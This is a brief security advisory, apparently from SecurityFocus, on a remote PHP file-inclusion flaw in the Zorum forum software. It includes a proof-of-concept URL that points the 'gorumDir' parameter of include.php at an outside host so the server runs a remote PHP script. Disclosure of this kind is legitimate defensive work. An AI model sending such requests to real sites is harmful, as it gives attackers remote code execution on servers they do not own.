7 lines
No EOL
444 B
Text
7 lines
No EOL
444 B
Text
source: http://www.securityfocus.com/bid/6669/info
|
|
|
|
It has been reported that Zorum may allow remote users to influence to location of PHP includes. Because of this, it is possible for a remote user to include an external arbitrary PHP script containing commands that may be carried out on the vulnerable host.
|
|
|
|
http://[target]/[forum_dir]/include.php?gorumDir=http://example.com/
|
|
-->
|
|
include http://example.com/group.php on remote server |